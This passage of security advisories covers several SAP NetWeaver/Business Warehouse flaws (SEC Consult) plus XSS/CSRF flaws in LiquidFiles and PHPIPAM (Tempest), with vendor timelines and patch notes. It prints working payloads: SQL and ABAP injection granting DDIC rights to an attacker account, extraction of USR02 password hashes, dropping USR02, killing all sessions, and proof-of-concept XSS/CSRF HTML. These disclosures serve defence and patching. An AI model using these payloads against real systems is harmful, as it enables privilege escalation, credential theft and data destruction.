╞══════════════════════════════════════════════════════════════╡ │ BNAME = 'TEST'. ENDSELECT. │ ├──────────────────────────────────────────────────────────────┤ │ UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER' │ ├──────────────────────────────────────────────────────────────┤ │ SELECT * FROM USR02 │ ╘══════════════════════════════════════════════════════════════╛ 3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation) The vulnerable function does not perform any explicit authorization check. Depending on a specific import parameter, the function leaks active logon sessions (opcode 02) or terminates all active logon sessions (opcode 25) by kernel call 'ThUsrInfo'. Invoking the function periodically prevents users from logging into the application server. The following payload exploits the bug to trigger the information disclosure and enumerate active user sessions: Import Parameter: MODE Value: 1 The following payload exploits the bug to terminate all active user sessions: Import Parameter: MODE Value: 2 4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface) The vulnerable function does not perform any explicit authorization check. It uses predefined classes and methods from the ABAP Database Connectivity (ADBC) framework to execute native SQL queries at database level. Depending on specific import parameters, this allows to read out arbitrary table data including user master records or secure storages (e.g. RSECTAB). The following payload exploits the bug to exfiltrate user password hashes: Import Table: I_S_TABSEL ╒══════════════════════════════════════════════════════════════╕ │ NAME │ ╞══════════════════════════════════════════════════════════════╡ │ USR02 │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_S_DBCON ╒══════════════════════════════════════════════════════════════╕ │ CON_NAME │ ╞══════════════════════════════════════════════════════════════╡ │ <Database Connection String> (e.g. DEFAULT) │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_T_DBFIELDS ╒═══════════════╤═════════╤════════════════════════════════════╕ │ NAME │ TYPE │ LENGTH │ ╞═══════════════╪═════════╪════════════════════════════════════╡ │ BNAME │ CHAR255 │ 000255 │ ├───────────────┼─────────┼────────────────────────────────────┤ │ PWDSALTEDHASH │ CHAR255 │ 000255 │ ╘══════════════════════════════════════════════════════════════╛ 5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface) The vulnerable function does not perform any input validation or output sanitization on import parameters that can be used to define conditional SQL statements. This allows to inject arbitrary SQL commands that get executed natively at database level in the course of execution of the function. The following payload exploits the bug to escalate privileges via reference user assignment: Import Table: I_S_TABSEL ╒══════════════════════════════════════════════════════════════╕ │ NAME │ ╞══════════════════════════════════════════════════════════════╡ │ USR02 │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_S_DBCON ╒══════════════════════════════════════════════════════════════╕ │ CON_NAME │ ╞══════════════════════════════════════════════════════════════╡ │ <Database Connection String> (e.g. DEFAULT) │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_T_DBFIELDS ╒═══════════════╤═════════╤════════════════════════════════════╕ │ NAME │ TYPE │ LENGTH │ ╞═══════════════╪═════════╪════════════════════════════════════╡ │ BNAME │ CHAR255 │ 000255 │ ╘══════════════════════════════════════════════════════════════╛ Import Table: I_T_SELECT ╒══════════════════════╤════════╤══════════════════════════════╕ │ FIELDNM │ OPTION │LOW │ ╞══════════════════════╪════════╪══════════════════════════════╡ │ BNAME │ EQ │'';UPDATE USREFUS SET REFUSER │ │ │ │='DDIC' WHERE '1 │ ├──────────────────────┼────────┼──────────────────────────────┤ │ ' = '1 AND' AND BNAME│ EQ │'ATTACKER'; │ ╘══════════════════════════════════════════════════════════════╛ 6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA The vulnerable function makes use of the INSERT REPORT instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. Inserted code may be executed by chaining this bug with CVE-2021-21473. The following payload exploits the bug to escalate privileges via reference user assignment: Import Parameter: I_TABLE_NAME Value: INJECTION Import Parameter: I_DEBUG_SUFFIX Value: SAP Import Table: I_T_RANGE_STRING ╒═══════════╤═════════════════════════════════════╤════════════╕ │ CHANM │ LOW │ HIGH │ ╞═══════════╪═════════════════════════════════════╪════════════╡ │ BNAME │ '. UPDATE USREFUS SET REFUSER │ '. EXIT. " │ │ │ = 'DDIC' WHERE BNAME = 'ATTACKER │ │ ╘═══════════╧═════════════════════════════════════╧════════════╛ 7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform The vulnerable function uses a dynamically generated program name (based on data from untrusted sources) in a SUBMIT call. No authorization checks are programmatically enforced. Thus, a remote, unauthorized attacker can leverage this function to start any existing ABAP report by providing the respective report name in the import parameter REPORTNAME. 8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework) The vulnerable function makes use of the GENERATE SUBROUTINE POOL instruction in form 'get_dynamic_fields' by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. These parameters are limited in size due to their variable type. This restricts an attacker in exploitation scenarios. However, it is still possible, for example, to delete critical system tables by exploiting this bug. The following payload exploits the bug to drop table USR02, leading to a complete loss of availability of the target system: Import Parameter: RTABNAME Value: X. EXEC SQL. DROP TABLE USR02- Import Parameter: RFIELDNAME Value: ENDEXEC Vulnerable / tested versions: ----------------------------- All tests were conducted on SAP NetWeaver Application Server ABAP 752 SP04 and ABAP Platform 1909. No additional testing on other releases has been carried out. According to the vendor the following releases and versions are affected by the discovered vulnerabilities: 1) SAP NetWeaver (ABAP Server) and ABAP Platform, Versions - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755 Components: SAP_BW, SAP_BW_VIRTUAL_COMP 2) SAP AS ABAP (DMIS), Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA(DMIS), Versions - 101, 102, 103, 104, 105 Components: DMIS, S4CORE 3) SAP NetWeaver AS ABAP (SAP Landscape Transformation - DMIS), Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA (SAP Landscape Transformation), Versions - 101, 102, 103, 104, 105 Components: DMIS, S4CORE 4) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 782 Components: SAP_BW, SAP_BW_VIRTUAL_COMP 5) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 782 Components: SAP_BW, SAP_BW_VIRTUAL_COMP 6) SAP Business Warehouse, Versions - 700, 701, 702, 711, 730, 731, 740, 750, 782; SAP BW4HANA, Versions - 100, 200 Components: SAP_BW, DW4CORE 7) SAP NetWeaver AS ABAP and ABAP Platform, Versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755 Components: SAP_BASIS 8) SAP NetWeaver AS ABAP (Reconciliation Framework) - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B, 75C, 75D, 75E, 75F Components: SAP_ABA Vendor contact timeline: ------------------------ The following timelines have been split for each CVE/vulnerability, as different contacts were responsible. All identified vulnerabilities have been fixed by now by SAP and SEC Consult releases this security advisory adhering to the responsible disclosure policy. CVE-2020-6318 -------------------------------- 2020-08-12 | Contacting vendor with detailed report through vulnerability submission web form. 2020-08-13 | Vendor confirms receipt and assigns security incident number #2080354772. 2020-08-19 | Vendor confirms vulnerability. 2020-08-24 | Vendor informs about patch development strategy. 2020-09-07 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2020-09-08 | Vendor releases patch with SAP Security Note 2958563. CVE-2020-26808 -------------------------------- 2020-09-24 | Contacting vendor with detailed report through vulnerability submission web form. 2020-09-25 | Vendor confirms receipt and assigns security incident number #2070354293. 2020-10-20 | Contacting vendor to request progress information. 2020-10-21 | Vendor confirms vulnerability and states that a fix is in development. 2020-11-09 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2020-11-10 | Vendor releases patch with SAP Security Note 2973735. CVE-2020-26832 -------------------------------- 2020-10-23 | Contacting vendor with detailed report through vulnerability submission web form. 2020-10-26 | Vendor confirms receipt and assigns security incident number #2070432866. 2020-11-17 | Vendor confirms vulnerability and proposes CVSS score of 7.6. 2020-11-23 | Vendor asks for exploit script shown in the initial report. 2020-11-24 | Providing the requested script via encrypted PGP mail. 2020-12-07 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2020-12-08 | Vendor releases patch with SAP Security Note 2993132. CVE-2021-21465 / CVE-2021-21468 -------------------------------- 2020-10-27 | Contacting vendor with detailed report through vulnerability submission web form. 2020-10-29 | Vendor confirms receipt and assigns separated security incident numbers #2070446047 and #2070446050. 2020-11-06 | Vendor confirms vulnerability and predicts patches to be released on December Patch Tuesday 2020. 2020-11-18 | Vendor confirms that they are still on track for December Patch Tuesday 2020. 2020-12-01 | Vendor informs that patch needs to be postponed to January Patch Tuesday 2021. 2021-01-08 | Vendor informs about release of patches and clarifies that a single security note will fix both issues. Additional information about CVSS scores is provided. 2021-01-11 | Vendor informs about release of the patches, registration of CVE numbers and corresponding security note. 2021-01-12 | Vendor releases patches with SAP Security Note 2986980. CVE-2021-21466 / CVE-2021-21473 -------------------------------- 2020-11-25 | Contacting vendor with detailed report through vulnerability submission web form. 2020-11-27 | Vendor confirms receipt and assigns security incident number #2080396648. 2021-01-04 | Vendor confirms vulnerability and states that they are working on a fix. Additional information is provided detailing on that they will split the reported finding into two separated security issues and security incident numbers #2080396648 and #2080412695. 2021-01-11 | Vendor informs about release of the first patch, registration of CVE number and corresponding security note. 2021-01-11 | Vendor informs about patch release for the first issue. Additional information is provided describing that a patch for the second issue is still in development. 2021-01-12 | Vendor releases first patch with SAP Security Note 2999854. 2021-05-07 | Asking vendor for update regarding the second issue. 2021-05-11 | Vendor informs that fix is in progress and note will be released soon. 2021-06-07 | Vendor informs about release of the second patch, registration of CVE number and corresponding security note. 2021-06-08 | Vendor releases second patch with SAP Security Note 3002517. CVE-2021-33678 -------------------------------- 2021-02-01 | Contacting vendor with detailed report through vulnerability submission web form. 2021-02-03 | Vendor confirms receipt and assigns security incident number #2180074995. 2021-05-07 | Asking vendor for update. 2021-05-11 | Vendor informs that fix is in progress. 2021-07-12 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2021-07-13 | Vendor releases patch with SAP Security Note 3048657. Solution: --------- SAP SE reacted promptly to our findings. Product Security Incident Response Team (PSRT) and engineers released patches in a timely manner for each of the reported issues. These patches are available in form of SAP Security Notes which can be accessed via the SAP Customer Launchpad [5]. More information can also be found at the Official SAP Product Security Response Space [6]. The following Security Notes need to be implemented: 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657 [5] https://launchpad.support.sap.com/#/securitynotes [6] https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF F. Hagg, A. Meier / @2022 </code></pre>

<pre><code>=====[ Tempest Security Intelligence - ADV-12/2021 ]========================== LiquidFiles - 3.4.15 Author: Rodolfo Tavares Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents]================================================== * Overview * Detailed description * Timeline of disclosure * Thanks & Acknowledgements * References =====[ Vulnerability Information]============================================= * Class: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] * CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N =====[ Overview]======================================================== * System affected : LiquidFiles * Software Version : Version - 3.4.15 * Impacts : * XSS: LiquidFiles 3.4.15 has stored XSS through the "send email" functionality when sending a file via email to an administrator. When a file has no extension and contains malicious HTML / JavaScript content (such as SVG with HTML content), the payload is executed upon a click. This is fixed in 3.5. =====[ Detailed description]================================================= * Stored XSS at [http://localhost:8080/message/new]: * Steps to reproduce 1 - Create a file without extension, with the content below inside ``` <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,100 100,0" fill="#0000FF" stroke="#0000FF"/> <script type="text/javascript"> alert(1); </script> </svg> ``` 2 - With an external user send an email with that file (without any extension) to admin or someone. 3 - With the admin account go to the menu click on "Data", inside the "Data" menu click at "Messages", and select the message that you sent at step 2. At the table click on the filename row over your file, the javascript code will be executed. =====[ Timeline of disclosure]=============================================== 11/Jan/2021 - Responsible disclosure was initiated with the vendor. 12/Jan/2021 - LiquidFiles Support confirmed the issue; 18/Fev/2021 - The vendor fixed the vulnerability the second stored XSS's 06/Apr/2021 - CVEs was assigned and reserved as CVE-2021-30140 =====[ Thanks & Acknowledgements]======================================== * Tempest Security Intelligence [5] =====[ References ]===================================================== [1][ [ https://cwe.mitre.org/data/definitions/79.html]|https://cwe.mitre.org/data/definitions/79.html ]] [2][ [https://gist.github.com/rodnt/9f7d368fac38cafa7334598ec94fb167]] [3][ [https://www.tempest.com.br| https://www.tempest.com.br/]|https://www.tempest.com.br/] =====[ EOF ]=========================================================== -- </code></pre>

<pre><code>=====[ Tempest Security Intelligence - ADV-03/2022 ]========================== PHPIPAM - Version 1.4.4 Author: Rodolfo Tavares Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents ]================================================== * Overview * Detailed description * Timeline of disclosure * Thanks & Acknowledgements * References =====[ Vulnerability Information ]============================================= * Class: Improper Neutralization of Input During Web Page Generation ('Cross-Site Scripting') [CWE-79] * CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L * Class: Cross-Site Request Forgery (CSRF) [CWE-352] * CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L =====[ Overview ]======================================================== * System affected: PHPIPAM - Version 1.4.4 * Software Version: Version 1.4.4 (other versions may also be affected). * Impact: PHPIPAM 1.4.4 is vulnerable to Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) via app/admin/subnets/find_free_section_subnets.php. An attacker can exploit this by injecting javascript code to coerce an admin user into performing unintended actions. =====[ Detailed description ]================================================= The html codes below exploit vulnerabilities in the same way due to the fact that both forms do not contain CSRF tokens and are vulnerable to XSS attacks. Then an attacker can host the forms on their malicious host and trick an administrator into visiting your page. If successful, the javascript code will execute. * [app/admin/subnets/find_free_section_subnets.php] <html> <body> <h1> Exploit PHPIPAM </h1> <script>history.pushState('', '', '/')</script> <form action=" http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php" method="POST"> <input type="hidden" name="container" value="body" /> <input type="hidden" name="placement" value="top" /> <input type="hidden" name="sectionid" value="2'><input onpointerleave="alert(1)">rodnt</input><script>alert('incogbyte')</script>" /> <input type="hidden" name="original-title" value="Search for free subnets in section " /> <input type="submit" value="Exploit" /> </form> </body> </html> =====[ Timeline of disclosure ]=============================================== 13/Jan/2022 - Responsible disclosure was initiated with the vendor; 14/Jan/2022 - PHPIPAM confirmed the issues; 17/Jan/2022 - The vendor fixed the issues XSS and CSRF; 24/Mar/2022 - CVE reserved as CVE-2021-46426; 25/Mar/2022 - CVE assigned [5]. =====[ Thanks & Acknowledgements ]======================================== * Tempest Security Intelligence [4] =====[ References ]===================================================== [1] [ https://cwe.mitre.org/data/definitions/352.html|https://cwe.mitre.org/data/definitions/352.html ] [2] [ https://cwe.mitre.org/data/definitions/79.html|https://cwe.mitre.org/data/definitions/79.html ] [3] [ https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351|https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351 ] [4] [https://www.tempest.com.br|https://www.tempest.com.br/] [5] [ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426 ] [6][ Thanks to Celso (CGB) =)] =====[ EOF ]=========================================================== -- </code></pre>